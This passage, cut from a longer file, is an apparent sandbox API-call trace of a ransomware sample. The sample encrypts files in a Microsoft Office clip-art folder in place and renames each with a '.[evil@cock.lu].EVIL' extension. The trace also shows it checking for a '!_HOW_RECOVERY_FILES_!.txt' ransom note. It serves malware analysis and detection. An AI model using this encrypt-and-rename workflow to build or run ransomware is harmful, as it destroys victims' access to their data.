_Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 69 [0127.232] wcscmp (_String1="HTECH_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.232] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HTECH_01.MID") returned 0x0 [0127.232] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 0x45 [0127.232] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.235] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c0a, lpOverlapped=0x0) returned 1 [0127.243] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.243] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.243] _errno () returned 0x84b1160840 [0127.243] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.243] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1c20, lpOverlapped=0x0) returned 1 [0127.243] CloseHandle (hObject=0x1a8) returned 1 [0127.243] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.244] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.244] __uncaught_exception () returned 0x84b1160800 [0127.244] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.244] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid.[evil@cock.lu].evil")) returned 1 [0127.245] ??_V@YAXPEAX@Z () returned 0x1 [0127.249] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID", dwFileAttributes=0x200) returned 0 [0127.249] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.249] wcsstr (_Str="IN00046_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.249] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 69 [0127.249] wcscmp (_String1="IN00046_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.249] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00046_.WMF") returned 0x0 [0127.249] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 0x45 [0127.249] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00046_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.252] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x486, lpOverlapped=0x0) returned 1 [0127.255] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.255] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.255] _errno () returned 0x84b1160840 [0127.256] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.256] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4a0, lpOverlapped=0x0) returned 1 [0127.256] CloseHandle (hObject=0x1a8) returned 1 [0127.256] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.256] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.256] __uncaught_exception () returned 0x84b1160800 [0127.256] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.257] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00046_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00046_.wmf.[evil@cock.lu].evil")) returned 1 [0127.258] ??_V@YAXPEAX@Z () returned 0x1 [0127.261] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF", dwFileAttributes=0x200) returned 0 [0127.261] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.262] wcsstr (_Str="IN00118_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.262] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 69 [0127.262] wcscmp (_String1="IN00118_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.262] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00118_.WMF") returned 0x0 [0127.262] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 0x45 [0127.262] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00118_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.264] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x318, lpOverlapped=0x0) returned 1 [0127.268] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.268] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.268] _errno () returned 0x84b1160840 [0127.268] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.268] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x320, lpOverlapped=0x0) returned 1 [0127.268] CloseHandle (hObject=0x1a8) returned 1 [0127.268] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.268] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.269] __uncaught_exception () returned 0x84b1160800 [0127.269] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.269] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00118_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00118_.wmf.[evil@cock.lu].evil")) returned 1 [0127.270] ??_V@YAXPEAX@Z () returned 0x1 [0127.273] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF", dwFileAttributes=0x200) returned 0 [0127.274] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.274] wcsstr (_Str="IN00177_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.274] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 69 [0127.274] wcscmp (_String1="IN00177_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.274] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00177_.WMF") returned 0x0 [0127.274] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 0x45 [0127.274] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00177_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.276] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x432, lpOverlapped=0x0) returned 1 [0127.280] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.280] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.280] _errno () returned 0x84b1160840 [0127.280] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.280] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x440, lpOverlapped=0x0) returned 1 [0127.280] CloseHandle (hObject=0x1a8) returned 1 [0127.280] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.281] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.281] __uncaught_exception () returned 0x84b1160800 [0127.281] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.281] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00177_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00177_.wmf.[evil@cock.lu].evil")) returned 1 [0127.282] ??_V@YAXPEAX@Z () returned 0x1 [0127.286] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF", dwFileAttributes=0x200) returned 0 [0127.286] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.286] wcsstr (_Str="IN00204_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.286] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 69 [0127.286] wcscmp (_String1="IN00204_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.286] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00204_.WMF") returned 0x0 [0127.286] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 0x45 [0127.286] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00204_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.288] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x738, lpOverlapped=0x0) returned 1 [0127.292] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.292] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.292] _errno () returned 0x84b1160840 [0127.292] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.292] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x740, lpOverlapped=0x0) returned 1 [0127.292] CloseHandle (hObject=0x1a8) returned 1 [0127.292] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.293] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.293] __uncaught_exception () returned 0x84b1160800 [0127.293] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.293] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00204_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00204_.wmf.[evil@cock.lu].evil")) returned 1 [0127.294] ??_V@YAXPEAX@Z () returned 0x1 [0127.298] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF", dwFileAttributes=0x200) returned 0 [0127.298] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.298] wcsstr (_Str="IN00233_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.298] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 69 [0127.298] wcscmp (_String1="IN00233_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.298] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00233_.WMF") returned 0x0 [0127.298] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 0x45 [0127.298] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00233_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.301] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2bb6, lpOverlapped=0x0) returned 1 [0127.475] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.475] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.475] _errno () returned 0x84b1160840 [0127.475] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.475] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2bc0, lpOverlapped=0x0) returned 1 [0127.475] CloseHandle (hObject=0x1a8) returned 1 [0127.475] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.475] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.475] __uncaught_exception () returned 0x84b1160800 [0127.475] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.476] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00233_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00233_.wmf.[evil@cock.lu].evil")) returned 1 [0127.476] ??_V@YAXPEAX@Z () returned 0x1 [0127.479] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF", dwFileAttributes=0x200) returned 0 [0127.479] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.479] wcsstr (_Str="IN00343_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.479] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 69 [0127.479] wcscmp (_String1="IN00343_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.479] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00343_.WMF") returned 0x0 [0127.479] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 0x45 [0127.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00343_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.481] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x764, lpOverlapped=0x0) returned 1 [0127.483] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.484] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.484] _errno () returned 0x84b1160840 [0127.484] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.484] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x780, lpOverlapped=0x0) returned 1 [0127.484] CloseHandle (hObject=0x1a8) returned 1 [0127.484] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.484] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.484] __uncaught_exception () returned 0x84b1160800 [0127.484] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.484] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00343_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00343_.wmf.[evil@cock.lu].evil")) returned 1 [0127.485] ??_V@YAXPEAX@Z () returned 0x1 [0127.487] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF", dwFileAttributes=0x200) returned 0 [0127.488] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.488] wcsstr (_Str="IN00346_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.488] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 69 [0127.488] wcscmp (_String1="IN00346_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.488] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00346_.WMF") returned 0x0 [0127.488] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 0x45 [0127.488] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00346_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.491] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2b8, lpOverlapped=0x0) returned 1 [0127.494] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.494] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.494] _errno () returned 0x84b1160840 [0127.494] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.494] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2c0, lpOverlapped=0x0) returned 1 [0127.494] CloseHandle (hObject=0x1a8) returned 1 [0127.494] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.494] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.494] __uncaught_exception () returned 0x84b1160800 [0127.494] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.531] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00346_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00346_.wmf.[evil@cock.lu].evil")) returned 1 [0127.532] ??_V@YAXPEAX@Z () returned 0x1 [0127.536] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF", dwFileAttributes=0x200) returned 0 [0127.536] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.536] wcsstr (_Str="IN00351_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.536] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 69 [0127.536] wcscmp (_String1="IN00351_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.536] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IN00351_.WMF") returned 0x0 [0127.536] wcslen 